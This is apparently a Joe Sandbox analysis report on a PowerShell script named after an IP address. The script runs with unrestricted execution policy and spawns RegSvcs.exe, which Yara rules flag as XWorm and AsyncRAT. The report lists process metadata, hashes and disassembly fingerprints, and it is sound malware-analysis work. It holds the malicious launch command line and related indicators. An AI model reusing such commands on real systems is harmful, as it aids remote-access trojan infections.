Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	03:48:55
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:48:56
Start date:	29/12/2024
Path:	C:\Windows\System32\ipconfig.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\ipconfig.exe" /flushdns
Imagebase:	0x7ff698f60000
File size:	35'840 bytes
MD5 hash:	62F170FB07FDBB79CEB7147101406EB8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:48:57
Start date:	29/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x510000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	03:51:05
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736
Imagebase:	0x800000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Function 00007FFD9B980FA4 Relevance: 2.0, Instructions: 1964COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702585231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbdcf41a754d7542396399cf7cc7061ab2e87f8ff29ceedca22929c57c6d63ca
Instruction ID: e9809a837bef08d71d0451905374376babbb0831a93e5b39dc1f1025985df51a
Opcode Fuzzy Hash: cbdcf41a754d7542396399cf7cc7061ab2e87f8ff29ceedca22929c57c6d63ca
Instruction Fuzzy Hash: A9C26A32B1EF991FE76A976858655B43BD1EF4A314B0A01FFD04DC71E3DA28AD068381

Function 00007FFD9B981390 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702585231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f22e5d449296ec1407dbb84b3ab0eacecb58167aa6d651798ea42d4f947c4125
Instruction ID: 4c0d8146efdb62910942d884b3a774f99a02c90cebaf7dd73dd7d9b84c410f47
Opcode Fuzzy Hash: f22e5d449296ec1407dbb84b3ab0eacecb58167aa6d651798ea42d4f947c4125
Instruction Fuzzy Hash: A4510521B1EE9E1FEBA5CBAC44A46747BE1EF59214B0A01FBD40DC71E3DA28ED058341

Function 00007FFD9B9827E9 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702585231.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b980000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea191ddfd06abd330c5950d4fb883659c79072d156de0e91c3798cf692ba1ccd
Instruction ID: 5680bc64c4fefba2568f7a5743523caec736cf3acd55c90b7b4ab8c497fe89e5
Opcode Fuzzy Hash: ea191ddfd06abd330c5950d4fb883659c79072d156de0e91c3798cf692ba1ccd
Instruction Fuzzy Hash: E111573050EBC98FDB529F7498666943FB0FF13304F4A01EBD4988B0E3D6299958C742

Function 00007FFD9B8BD8D5 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbe3e2628ace07404ede23bf825c8add17f8fabd26f53346219fc2f9a39431e2
Instruction ID: 246382aa5e205c1c2ff4a52e4ce9720dffce23c295d98db3f9467fe9c0470064
Opcode Fuzzy Hash: dbe3e2628ace07404ede23bf825c8add17f8fabd26f53346219fc2f9a39431e2
Instruction Fuzzy Hash: 2D015271908A4D8FDF85EF68C858AEA7BF0FF28305F0505EAD419C72A5DB319644CB80

Function 00007FFD9B8B37B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: ad11833d54da4bcaa44fa23ccdbb85ddc80141cc9248b7fa53866c9f89e6517d
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: 9C01A77020CB0D8FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1D632E882CB45

Function 00007FFD9B8B6709 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35644a4baa6827f1562d7df739c74998a0072b3f0b9791aadcf9f8980bf4d54e
Instruction ID: 868bce5fab28771c1230c5cceb3aedc3d34723227a06688b4547afd028c17223
Opcode Fuzzy Hash: 35644a4baa6827f1562d7df739c74998a0072b3f0b9791aadcf9f8980bf4d54e
Instruction Fuzzy Hash: C1F0FF7190E3CE8FEB929FA888696DA7FB0FF54200F0502E7D058C71A6DA3895448B81

Function 00007FFD9B8B6720 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9f9b31f7ddc2129060fcee6b9fd8aa25aa5c1da5565172bdfe26d18ba540154
Instruction ID: 36eadb9adf3926a88a204cff00e9afcbc521dad59ee513219a06665aab7dd5af
Opcode Fuzzy Hash: a9f9b31f7ddc2129060fcee6b9fd8aa25aa5c1da5565172bdfe26d18ba540154
Instruction Fuzzy Hash: D2F0657191564EDFEF91EFA89859AEAB7E0FF58304F100276E41CC2154DA3492518B81

Function 00007FFD9B8B4C55 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d730a31d914068eb6916756a8a27227bfdcd3420b0582891c49177a4d0f683a7
Instruction ID: 9858d9177082238fe425f82fb021f4f8475b2eac5090197ad78d5d98ed06e291
Opcode Fuzzy Hash: d730a31d914068eb6916756a8a27227bfdcd3420b0582891c49177a4d0f683a7
Instruction Fuzzy Hash: A7F0D021A0E2DD4EE76367B458761E97FB09F46304F4E04FAD498C60B7D92856188B62

Function 00007FFD9B8B4C45 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702230481.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b8b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cdb5a43a80d9464f6c29531cbf5865f1751a0ec897a08ce1ab896b3ce31982d
Instruction ID: d8fe6fff7711ebc0fcee125c198e05b853f5d37b23f901e32132eb21d1ea3700
Opcode Fuzzy Hash: 5cdb5a43a80d9464f6c29531cbf5865f1751a0ec897a08ce1ab896b3ce31982d
Instruction Fuzzy Hash: C3D0EC25B0A02E8AE7212BF4653B1F93350DF09304F0A0139E41D414B78E2D271589A2

Analysis Process: RegSvcs.exePID: 5252, Parent PID: 6820COMMON

Execution Graph

Execution Coverage:	15.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	70
Total number of Limit Nodes:	15

Executed Functions

Function 04D43410 Relevance: 6.7, Strings: 5, Instructions: 442
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 04D43985
(o^q, xrefs: 04D4365A
(o^q, xrefs: 04D43668
,bq, xrefs: 04D436E0
,bq, xrefs: 04D436D2

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: 6fa29c1a6f289a3774d2a2040fef6d5488d30dc031afdfc6e829d71206e5fe5f
Instruction ID: 4bed1fe7db9b332e1701ba9e14ba6a76657933616eb043b72652065c444bdbb7
Opcode Fuzzy Hash: 6fa29c1a6f289a3774d2a2040fef6d5488d30dc031afdfc6e829d71206e5fe5f
Instruction Fuzzy Hash: 01023971B00209DFDB14DFADC988AAEBBF2FF89310F158469E855AB261D734E941CB50

Function 04D47948 Relevance: 3.0, Strings: 2, Instructions: 536
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ykk., xrefs: 04D486E0
%a, xrefs: 04D486ED

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: ykk.$%a
API String ID: 0-2664548475
Opcode ID: 0cf4d0f8a254e5d365036a633b606e1111108e728192243e18deca9a910aff61
Instruction ID: 239ec51883e3d3fe22773f224f1a43995c86ae4691da9ab58dd4926e2a17eff6
Opcode Fuzzy Hash: 0cf4d0f8a254e5d365036a633b606e1111108e728192243e18deca9a910aff61
Instruction Fuzzy Hash: BD32AE74B00215CFDB64EF65C8A5BAAB7B2AB85340F1084E9E40AAB394DB31DD81DF51

Function 04D42DE8 Relevance: 3.0, Strings: 2, Instructions: 511COMMON

Download Yara Rule

Strings

(o^q, xrefs: 04D43322
Hbq, xrefs: 04D431EE

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: 1575101a2991ad84f2cc52c8629bfb0592e8ea5c0dd2db24641198edd166f37b
Instruction ID: 6620ff10d487433360d0ac6a324f328c855c2c4a01856a20f8a673cd1eff1b6a
Opcode Fuzzy Hash: 1575101a2991ad84f2cc52c8629bfb0592e8ea5c0dd2db24641198edd166f37b
Instruction Fuzzy Hash: 8B126C71B002599FDB14DF69C894AAEBBF6BFC8300F148569E8499B391DF34AD42CB50

Function 04D40EF8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8307a400dc43845899c588edc64ebbaba62cdd04cd082f96045aff7f11765ca9
Instruction ID: 83dd6136145df81edd26ecc4f97cac6dba2bed740961a962a07f31cc494a3e02
Opcode Fuzzy Hash: 8307a400dc43845899c588edc64ebbaba62cdd04cd082f96045aff7f11765ca9
Instruction Fuzzy Hash: F57127357101008FC715DF78DA55A1A77A6FBC4310F10C4AAE94ADB394EA75FC02CBA1

Function 04D40FAE Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4de519fa6001113c45ceecfef7d7d7c1108cf461d819c0aa9ebec52d0fe068f
Instruction ID: 583d1b4e968635e98332c4119e66bddfb540ffbdb143fc564a3b78e5ab410a24
Opcode Fuzzy Hash: a4de519fa6001113c45ceecfef7d7d7c1108cf461d819c0aa9ebec52d0fe068f
Instruction Fuzzy Hash: E0612435710100CFC715DF38DA99A1A77A6FBC4314F14C8A6E94ADB3A4EA74EC06CBA1

Function 04D406D0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7deb9343c3a3f5e16a6094d30da51155f8317a489383081e0b16193a1f380215
Instruction ID: 129b3499828c1fe85861dcf451ef05bf41d34290567782301d9a95f0938086fc
Opcode Fuzzy Hash: 7deb9343c3a3f5e16a6094d30da51155f8317a489383081e0b16193a1f380215
Instruction Fuzzy Hash: 54316531B18245CFC702DFADEA51116FFA6EBD8210705C563D649CF395E630EC018B96

Function 04D406C0 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec018873d4a40f64d29ef3214e8f215be5f4daa47346fc0c3bb05244b99cf7e
Instruction ID: bffbea8b63778cc437cd3a38af13ea06b3bcdb51fbdfd2f2af28d138274069b9
Opcode Fuzzy Hash: 8ec018873d4a40f64d29ef3214e8f215be5f4daa47346fc0c3bb05244b99cf7e
Instruction Fuzzy Hash: 3E315475B141418FC702DBB9EA41226FFA6EBD8310B09C56BD649CF355E630EC018B96

Function 04D40963 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7fae9a0d642199ab750cabe6f3e0ddedeaf5f96cecc1930486ef391cbb5a2c1
Instruction ID: 26d4a656c4b36903e30e2aba0df997f8c30d3e27f4af489e3597441becf639c9
Opcode Fuzzy Hash: f7fae9a0d642199ab750cabe6f3e0ddedeaf5f96cecc1930486ef391cbb5a2c1
Instruction Fuzzy Hash: CA318F30B042418FD7466BB9591172FBEEB9FD2300F18595F9646EB3E5C9B0D9064F82

Function 04D44C10 Relevance: 3.2, Strings: 2, Instructions: 696
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 04D45734
$^q, xrefs: 04D45757

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: bbb39632bff41eb5ae55c3f675f00f0b084e96d7e3856c3b49ee7fb28bcfaafc
Instruction ID: 481e9f7a48a8913fac564f133ad8c8fb5682c3090a45b3892a4602fb7aeb6ca7
Opcode Fuzzy Hash: bbb39632bff41eb5ae55c3f675f00f0b084e96d7e3856c3b49ee7fb28bcfaafc
Instruction Fuzzy Hash: 44527334A00218DFEB549FA4C960B9EBB76FF84300F1085A9D10AAB365DE35AE85DF51

Function 04D42428 Relevance: 2.8, Strings: 2, Instructions: 329
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 04D42546
Hbq, xrefs: 04D42513

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: c10697a195b8bad818e1910b85ceb9842c23322ee421df8f097f4e049e7df059
Instruction ID: 92418af0a6d6d628e988df91a5e169fea8dfa8f7ee96be1a6f563822aa56a58a
Opcode Fuzzy Hash: c10697a195b8bad818e1910b85ceb9842c23322ee421df8f097f4e049e7df059
Instruction Fuzzy Hash: B7C1A0353042518FCB159F39D898A2E7BA2FBC8351F1489A9E946CB395DF38DC42CB91

Function 04D428D8 Relevance: 2.7, Strings: 2, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 04D429BE
,bq, xrefs: 04D429C8

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: da661b15159e6ce1e01ed7fb93e99cd35e357d8bde3dbc9809d7f67bd7badf46
Instruction ID: 1d4e2d76de05fec1df92870cf8e4c27a3cbb54a05d7c0d0f6798821a4722cbfb
Opcode Fuzzy Hash: da661b15159e6ce1e01ed7fb93e99cd35e357d8bde3dbc9809d7f67bd7badf46
Instruction Fuzzy Hash: 92819030B006058FCB14CF69C88996AB7B2BFC9380B1585E9E856EB3A5D731F841CB91

Function 04D440D0 Relevance: 1.7, Strings: 1, Instructions: 458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 04D44109

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 42ec1b65c5ef9b682b677834ea9ac2835215be6f46d700a147c0588c5aa4b300
Instruction ID: 776ea057e9c411524cef176f7958984c1e921646a7f799f605760f276728f91f
Opcode Fuzzy Hash: 42ec1b65c5ef9b682b677834ea9ac2835215be6f46d700a147c0588c5aa4b300
Instruction Fuzzy Hash: D4122830600609DFCB55CF68C588AAABBF2FBC8315F198A59E415AB2A1D734FD81CF51

Function 04D402AD Relevance: 1.6, Strings: 1, Instructions: 344
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a^q, xrefs: 04D40547

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: a^q
API String ID: 0-3411664965
Opcode ID: 513038f08e839fcebf5bdc83118814ddf448d3fb8d7cde7d35930b0a0240b0e2
Instruction ID: 7e34ef23a716843c683ff9dc3413cf2b3f40f4dfb603ef8db3d7016c3105f1ce
Opcode Fuzzy Hash: 513038f08e839fcebf5bdc83118814ddf448d3fb8d7cde7d35930b0a0240b0e2
Instruction Fuzzy Hash: 68E0922270D3D11FC3079B6C5C90856BFE1AED625470909EFE5C0C7267C4148C19C3A1

Function 00B3EF36 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00B3EEEA), ref: 00B3EFD7

Memory Dump Source

Source File: 00000003.00000002.3278572933.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_RegSvcs.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 6a08ee7840ca926a9d64a891854caa6fdcfb3ba7678b0c38372138bbcfeadcb8
Instruction ID: ec5a3f976a2f81121943d717ec807d13ed1b04dabb8308fd516d3ccd4f723dd7
Opcode Fuzzy Hash: 6a08ee7840ca926a9d64a891854caa6fdcfb3ba7678b0c38372138bbcfeadcb8
Instruction Fuzzy Hash: A3219AB1C04299CFDB10CFAAD44479EFFF0AF48310F1084AAE454A7281D778A945CFA1

Function 00B3E5F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00B3EEEA), ref: 00B3EFD7

Memory Dump Source

Source File: 00000003.00000002.3278572933.0000000000B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_b30000_RegSvcs.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 3b64db52e45716f6a5cf8afd2b895e9b10469805faa358a5c1c6431989fde75c
Instruction ID: 843f35223e89f5fdaa91348258f2e785a84eb3ef9eda8f10d135f67741163948
Opcode Fuzzy Hash: 3b64db52e45716f6a5cf8afd2b895e9b10469805faa358a5c1c6431989fde75c
Instruction Fuzzy Hash: 6A11F4B1C006599BDB10DF9AD444B9EFBF4AB48320F10816AE414A7240D378A944CFA5

Function 04D448D0 Relevance: 1.5, Strings: 1, Instructions: 211COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04D44A82

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 237354ab9f54713abc973053485edb61f7ea3ece136f7d5b881f993439f14bb6
Instruction ID: 08f2223b52e0fe62b4a88d0d2cdaffb50ae3fd02d01f575eac43420a85894f2b
Opcode Fuzzy Hash: 237354ab9f54713abc973053485edb61f7ea3ece136f7d5b881f993439f14bb6
Instruction Fuzzy Hash: 56619F313041558FCB14DF79C894B6A7BE9FFCA34471584AAE856CB2A5EB30EC81DB60

Function 04D45AAA Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

(o^q, xrefs: 04D45D61

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: (o^q
API String ID: 0-74704288
Opcode ID: 84a9b8522d84ee3265281e3dc16471d170cc8e55426572960deeb0e60bfc12b9
Instruction ID: 26b8c783be4fbbc21501725dfb0de9dc867091b21dc2adb5010b3011950a7e77
Opcode Fuzzy Hash: 84a9b8522d84ee3265281e3dc16471d170cc8e55426572960deeb0e60bfc12b9
Instruction Fuzzy Hash: D751F731704244AFCB169B28E86476E7BB6FFC9310F1448AAE606DB391DE35EC02C751

Function 04D446C0 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

4'^q, xrefs: 04D4474B

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 85f171361aec7b8ae2a12a8c49c21b05e98f9a4e706da5bd0f398a7c61e3d4eb
Instruction ID: ab17cae9f9dbffc9334667f815d56255e65c3f066f807763bebbd1502028083b
Opcode Fuzzy Hash: 85f171361aec7b8ae2a12a8c49c21b05e98f9a4e706da5bd0f398a7c61e3d4eb
Instruction Fuzzy Hash: 23415A756002558FCB14CF28D848B6E7BB2FF89311F1044A5E905DB3A1CB35ED92CB90

Function 04D40AF8 Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

LR^q, xrefs: 04D40B1F

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: f46733d9221df4012428072404250eca6d0476ff1a2f06778b1f18e057d413b3
Instruction ID: 735693f04c476e94f6d182b415dc88f64eed053507c1acf8e8fd8039da2203a2
Opcode Fuzzy Hash: f46733d9221df4012428072404250eca6d0476ff1a2f06778b1f18e057d413b3
Instruction Fuzzy Hash: E4217931B151198FD796AE385C0222F71D3E7D4304F24447BEA4ADB390E930DC5187D6

Function 04D40B08 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

LR^q, xrefs: 04D40B1F

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID: LR^q
API String ID: 0-2625958711
Opcode ID: 102668109f6797c5f6b937366af61316d02f21e5911f7d79e66f6ddf2c85c128
Instruction ID: 583dcb6480a7440e557465de6e6ad8fba9d5840293aa22d01384453189291ff5
Opcode Fuzzy Hash: 102668109f6797c5f6b937366af61316d02f21e5911f7d79e66f6ddf2c85c128
Instruction Fuzzy Hash: 1C214536B102098BD7959E394C0122F71D7FBD8314F24846AEA0AEB384EA30EC41C7D6

Function 04D475B9 Relevance: .5, Instructions: 509COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 013c102922cbd68139d7b7a455905f6fca807b6a12db46609ea9ef862957bc99
Instruction ID: 95b4d18994e3465c0a5d0d41eac7661c0ff775d2b9431a3c18b4f040be423e2b
Opcode Fuzzy Hash: 013c102922cbd68139d7b7a455905f6fca807b6a12db46609ea9ef862957bc99
Instruction Fuzzy Hash: 06012430B062548FEB00CF68DC656AABBB39B8A310F1445AAD009E73D2CA719D00CB50

Function 04D45DA0 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3285865039.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4d40000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
